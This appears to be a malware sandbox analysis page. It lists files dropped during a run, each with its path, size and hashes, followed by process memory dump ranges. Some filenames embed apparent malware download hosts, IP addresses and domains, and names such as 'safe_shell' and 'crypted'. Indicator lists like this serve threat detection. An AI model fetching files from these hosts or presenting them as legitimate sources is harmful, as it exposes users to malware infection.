1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\FIIIIDGHJEBF\KKKJKE

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\ProgramData\freebl3.dll

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

Filesize
2KB

MD5
d47905f6e7e107424d9513067ec86237

SHA1
37e426eda9327a37a29397aed41ed80d51650dbe

SHA256
65e28f06857261e46bd404e484ba93f78826c8827c3c23b4a7a6450b839ce97b

SHA512
934ec39de1cb2a187a58b04c63f683728d9a4da20171e32fa14535be5a98a4d810102e013388c6de9e22650e83691c9829641b38e8d2434a3c4e7e3f0921f0c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

Filesize
2KB

MD5
c757f8d28bbb144e3bfcbb0a92bc2fc7

SHA1
da68dc5f35f8e1c6f0058a2dda618425a4a4df3b

SHA256
181e6536ddfc5eb23619f0add93cb465c89de808a4cff2e4243e572823ef41f4

SHA512
476655f4b5c6ed8f5448b4f07dac73c53296488de78169cbfebd3c9fbea84f874629ecc63eaeb7d9a769b5f6bfc5d255f378bcc7b26b428243e410b16feaeb30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

Filesize
1KB

MD5
f93fbb368d71ebd7ccbbc85b3b2466d0

SHA1
b9104b9c27079cdc0e8f6812372906eba3e48438

SHA256
9dd72374931dc921520a509a1523c01afbb75ac693eef66115ccb0ff65d439d6

SHA512
6764c9dbef5e1b3ed04df802debd1991f0ce448f7523845ea8f171cb37b1d625ef702bdc06422f0b5629bf17d1543cf4343768a6a7962c18f94ca2ba41b7a11e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

Filesize
458B

MD5
49a5fa470ed9415ec3000b3988292735

SHA1
8ca3882eac724bb24989a45716b0a5e1b50394e6

SHA256
43d007682185b9f7abc34e1fbd751251c7218567e657dc5633904728eb09b87b

SHA512
90ebaf03bc1a5e5566794d7ff9aea499f06a70b41f9a8f39e972c8a0eedb210edc0c43dbbd82aa527510ddbaddc46828677381e27d88cd7d7220015b679ce56f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

Filesize
450B

MD5
2f3d0000f0f0d07d949c9cbec10a02f2

SHA1
58c6360b97c3e9d1a46b701be9f573b7a3a5180c

SHA256
7abba26a16940048023f3dcf6f65afade1a69ec857de47987c67787ecfa8ab19

SHA512
50b779a3ec2ce898acd6d5bc833337db8149dca84fcdaef7a3a9fac0fdd7955b0b3e407b469f48c87f6ca770093d057232a82fe450716055a07dd1fbdc9b46d8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

Filesize
458B

MD5
75bd97235cd407fefc18e72816bcc6ef

SHA1
78148dd2b919d1978ddca6be6be2f27ed9c34c16

SHA256
5c069c4c547a384e131963c5f8e3e20e5d38fa7f0768d421012a8d18fbcf1b4a

SHA512
19cfc82b292276c1315ad268e52fb2e53c0469d6cbc8d25d1031acaf199156012b8e71508829c5f28ac3545afa1f982b300f0933deb89418eda9b9f9ccf5d879

Download Submit
C:\Users\Admin\AppData\Local\Temp\3197016522.exe

Filesize
10KB

MD5
9d3a5017e86fd5e182ca58c8293ffa3e

SHA1
242a24a7cda4f7c7a87c19c1ce036227b48f8235

SHA256
c339b1bf9947ba07e9203ebfdd6f41cf8414f4ef795d528c8f768eab0d136586

SHA512
009a35103362a59f83100425c702bf0072be3a3fa1afd508bc530f26a2b78f607ec70ffc4a2c929596943864b1a507a1ff4714bbfb4784d44d8dfa22084b710b

Download Submit
C:\Users\Admin\AppData\Local\Temp\635024184.exe

Filesize
18KB

MD5
c53b73c89515e712a301a9d17e313900

SHA1
154b857b1ceec6938851e57baa0861b6a1fceb16

SHA256
6e24c56691c01a191e88f193966e04000fe5b83caa9b5adb4afebbd6cc717c68

SHA512
eeefbefd1c36f8493c58cda9dbfa9ae6580a7507fb99f1deb3f869348a7e92d702cdae50c4f035b31303717984b4282fa9777e92fdd1a0c70ec32f4e7063efc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\810228086.exe

Filesize
86KB

MD5
fe1e93f12cca3f7c0c897ef2084e1778

SHA1
fb588491ddad8b24ea555a6a2727e76cec1fade3

SHA256
2ebc4a92f4fdc27d4ab56e57058575a8b18adb076cbd30feea2ecdc8b7fcd41f

SHA512
36e0524c465187ae9ad207c724aee45bcd61cfd3fa66a79f9434d24fcbadc0a743834d5e808e6041f3bd88e75deb5afd34193574f005ed97e4b17c6b0388cb93

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2o3wrs2p.50w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe

Filesize
9KB

MD5
8d8e6c7952a9dc7c0c73911c4dbc5518

SHA1
9098da03b33b2c822065b49d5220359c275d5e94

SHA256
feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278

SHA512
91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645

Download Submit
C:\Users\Admin\AppData\Local\Temp\http47.128.226.30safe_shell.shc.exe.exe

Filesize
1.7MB

MD5
0b6072d47b53fa8d3f9b28b449192dcc

SHA1
7f9ccce7504079ecb1b65db4600d038cdebf775d

SHA256
fb551ab74d9835dbaa9c305b206aa8ceec12ade2c82a947f9907d9284b3bb218

SHA512
88225781507323af1445dcb43f23b73840520588d2853cde382c756f0ac916a9013037f5022743a7a99b58ae3009e07e338f785c9850f434de317f2a84a4724e

Download Submit
C:\Users\Admin\AppData\Local\Temp\http77.105.132.27djsoftware.exe.exe

Filesize
4.3MB

MD5
7f81200d5a684a89dda672e85490ea30

SHA1
47702e5faa3b1c749e33a94f2bf9236657225c64

SHA256
c23b4a05be1b5587fe7d4283c7a99e44b695f486db8f225f5eabf9d7df75f37a

SHA512
f792d4d052a6e4564b245b0144750993a90a7632271af4a5513509f7a53e91f2da1e65e20c1ffeb3dc1d2695d9fe7c108811e009fbfbc34c452737af12cfb5f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\http77.105.132.27warsong.exe.exe

Filesize
4.3MB

MD5
2b40a46d4856cb9f79ecdd2d19ad74e7

SHA1
1dc70b5aecf5e570e06dcabbc94a795df1f1549f

SHA256
394f23df8704f763b90149b09c73a1a841e8590541d33b98a6c7412ff9bfa27c

SHA512
6176850bb3ab1b7bb00c63b1ae4d8e5277dbb41dc4d8f8d3116bdf79c1aaeb111576911b32901745af63225faf4af07786949d7d761208475c555be1efa84654

Download Submit
C:\Users\Admin\AppData\Local\Temp\http77.91.77.80vualtabor.exe.exe

Filesize
1.1MB

MD5
78e3e0dc0a184e415c9498955689c42f

SHA1
8e7e4de995024e95ba81a56ab07d0b54787dfead

SHA256
70327d0bb0336469e000be00781757112d8f37147a7ab29c57dc15ff7c11d488

SHA512
20637dbfcd13f1580c0e11cb541f60b40e5222b389c8b651893f5b00a080808ab9a731d6d55721d9eee3bf0361a010720a7df72c3212d96906c575993dcede0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe

Filesize
5.2MB

MD5
0891d36dd26059e8a74ada84fd9885e5

SHA1
743f9e888626f1313ef387e4fe4d16c86f092ef9

SHA256
fa41bf610e2af66a75a73cb1d348aecc9a275756710c05be99220bbddbd34674

SHA512
874bf077b0878deefae6542d48057aa4291bbb73747da90d24e7b8721c96a83768dd6a9dcc1dd4b00200185a50a4066f3cffd0c09e042863ba0396ac56297782

Download Submit
C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog66990947b9f24_crypted.exe#1.exe

Filesize
507KB

MD5
ae74c6d6ed392c35afafedfc9316d163

SHA1
1d2292a6c7bd70569cba3410308a1eb2dcc325b3

SHA256
f408c8ba5781966f6ce1da805de79deb4a5e3c9dfbe097493123257e6112bf71

SHA512
91f60b341a473534224ef2668102ec2fd047afa30e2f72c8ba8bb880688b3f1310f6d2a24c1ca317e1af8ba4cf336951ff2a5b948f477bb3dd1502798aa35f03

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpnamphuctourist.comtmp1.exe.exe

Filesize
27KB

MD5
c059d57ec1cb1b4a50cdfc56a251b1f8

SHA1
c7be6b9a6748d362b9ad53d93c090249c710ec0f

SHA256
cdd023d9441cfafd334e1c2bafdb4810d72cc54a41eb2d52a4f17389e0012a26

SHA512
e0718149ea6e6ed3cde43b456a840d20f1b49469aabd41f077201b2b583852b95498f2b95010719b053c7a9952d74e503a4166594a66d9a04727d18db49863a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe

Filesize
79KB

MD5
e2e3268f813a0c5128ff8347cbaa58c8

SHA1
4952cbfbdec300c048808d79ee431972b8a7ba84

SHA256
d8b83f78ed905a7948e2e1e371f0f905bcaaabbb314c692fee408a454f8338a3

SHA512
cb5aeda8378a9a5470f33f2b70c22e77d2df97b162ba953eb16da085b3c434be31a5997eac11501db0cb612cdb30fa9045719fcd10c7227c56cc782558e0c3bc

Download Submit
memory/672-49-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-94-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-86-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-84-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-82-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-80-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-78-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-76-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-74-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-72-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-68-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-66-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-64-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-60-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-58-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-90-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-92-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-88-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-97-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-98-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-100-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-102-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-104-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-106-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-108-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-70-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-62-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-54-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-56-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-52-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-50-0x0000000005B20000-0x0000000005B35000-memory.dmp

Filesize
84KB

Download
memory/672-48-0x0000000005B20000-0x0000000005B3C000-memory.dmp

Filesize
112KB

Download
memory/672-45-0x0000000005EC0000-0x0000000005FEA000-memory.dmp

Filesize
1.2MB

Download
memory/672-44-0x0000000005D40000-0x0000000005EC0000-memory.dmp

Filesize
1.5MB

Download
memory/672-43-0x0000000005CA0000-0x0000000005D3C000-memory.dmp

Filesize
624KB

Download
memory/672-42-0x0000000000DE0000-0x0000000001314000-memory.dmp

Filesize
5.2MB

Download
memory/2948-303-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2948-317-0x0000000005590000-0x00000000055DC000-memory.dmp

Filesize
304KB

Download
memory/2948-314-0x0000000005480000-0x000000000558A000-memory.dmp

Filesize
1.0MB

Download
memory/2948-313-0x0000000006200000-0x0000000006818000-memory.dmp

Filesize
6.1MB

Download
memory/2948-312-0x00000000051E0000-0x00000000051EA000-memory.dmp

Filesize
40KB

Download
memory/2948-470-0x0000000007A30000-0x0000000007A80000-memory.dmp

Filesize
320KB

Download
memory/2948-315-0x00000000053B0000-0x00000000053C2000-memory.dmp

Filesize
72KB

Download
memory/2948-316-0x0000000005410000-0x000000000544C000-memory.dmp

Filesize
240KB

Download
memory/2948-307-0x0000000005630000-0x0000000005BD4000-memory.dmp

Filesize
5.6MB

Download
memory/2948-309-0x0000000005120000-0x00000000051B2000-memory.dmp

Filesize
584KB

Download
memory/2948-475-0x0000000007FB0000-0x00000000084DC000-memory.dmp

Filesize
5.2MB

Download
memory/2948-474-0x0000000006F30000-0x00000000070F2000-memory.dmp

Filesize
1.8MB

Download
memory/3292-134-0x00000000056D0000-0x00000000057EA000-memory.dmp

Filesize
1.1MB

Download
memory/3292-133-0x00000000054E0000-0x000000000560E000-memory.dmp

Filesize
1.2MB

Download
memory/3292-132-0x0000000000880000-0x0000000000CE0000-memory.dmp

Filesize
4.4MB

Download
memory/3524-473-0x00007FF6DDEC0000-0x00007FF6DE078000-memory.dmp

Filesize
1.7MB

Download
memory/3524-206-0x00007FF6DDEC0000-0x00007FF6DE078000-memory.dmp

Filesize
1.7MB

Download
memory/3728-365-0x00000000080B0000-0x000000000872A000-memory.dmp

Filesize
6.5MB

Download
memory/3728-336-0x0000000006CB0000-0x0000000006CE2000-memory.dmp

Filesize
200KB

Download
memory/3728-408-0x0000000007C60000-0x0000000007C74000-memory.dmp

Filesize
80KB

Download
memory/3728-409-0x0000000007D50000-0x0000000007D6A000-memory.dmp

Filesize
104KB

Download
memory/3728-410-0x0000000007D30000-0x0000000007D38000-memory.dmp

Filesize
32KB

Download
memory/3728-403-0x0000000007C30000-0x0000000007C41000-memory.dmp

Filesize
68KB

Download
memory/3728-396-0x0000000007C90000-0x0000000007D26000-memory.dmp

Filesize
600KB

Download
memory/3728-311-0x0000000005810000-0x0000000005E38000-memory.dmp

Filesize
6.2MB

Download
memory/3728-367-0x0000000007A80000-0x0000000007A8A000-memory.dmp

Filesize
40KB

Download
memory/3728-310-0x0000000003120000-0x0000000003156000-memory.dmp

Filesize
216KB

Download
memory/3728-320-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/3728-366-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/3728-348-0x00000000078D0000-0x0000000007973000-memory.dmp

Filesize
652KB

Download
memory/3728-347-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

Filesize
120KB

Download
memory/3728-337-0x0000000073620000-0x000000007366C000-memory.dmp

Filesize
304KB

Download
memory/3728-407-0x0000000007C50000-0x0000000007C5E000-memory.dmp

Filesize
56KB

Download
memory/3728-319-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/3728-318-0x0000000005F80000-0x0000000005FA2000-memory.dmp

Filesize
136KB

Download
memory/3728-332-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/3728-321-0x0000000006100000-0x0000000006454000-memory.dmp

Filesize
3.3MB

Download
memory/4028-233-0x00000000055D0000-0x0000000005704000-memory.dmp

Filesize
1.2MB

Download
memory/4028-232-0x0000000005480000-0x00000000055C8000-memory.dmp

Filesize
1.3MB

Download
memory/4028-230-0x0000000000650000-0x0000000000A9C000-memory.dmp

Filesize
4.3MB

Download
memory/4372-503-0x00007FF963270000-0x00007FF963D31000-memory.dmp

Filesize
10.8MB

Download
memory/4372-1-0x000002683BA90000-0x000002683BA9A000-memory.dmp

Filesize
40KB

Download
memory/4372-469-0x00007FF963273000-0x00007FF963275000-memory.dmp

Filesize
8KB

Download
memory/4372-2-0x00007FF963270000-0x00007FF963D31000-memory.dmp

Filesize
10.8MB

Download
memory/4372-0-0x00007FF963273000-0x00007FF963275000-memory.dmp

Filesize
8KB

Download
memory/4732-306-0x0000000000CC0000-0x0000000001258000-memory.dmp

Filesize
5.6MB

Download
memory/4732-487-0x0000000000CC0000-0x0000000001258000-memory.dmp

Filesize
5.6MB

Download
memory/4760-109-0x0000000000400000-0x0000000000640000-memory.dmp

Filesize
2.2MB

Download
memory/4760-110-0x0000000000400000-0x0000000000640000-memory.dmp

Filesize
2.2MB

Download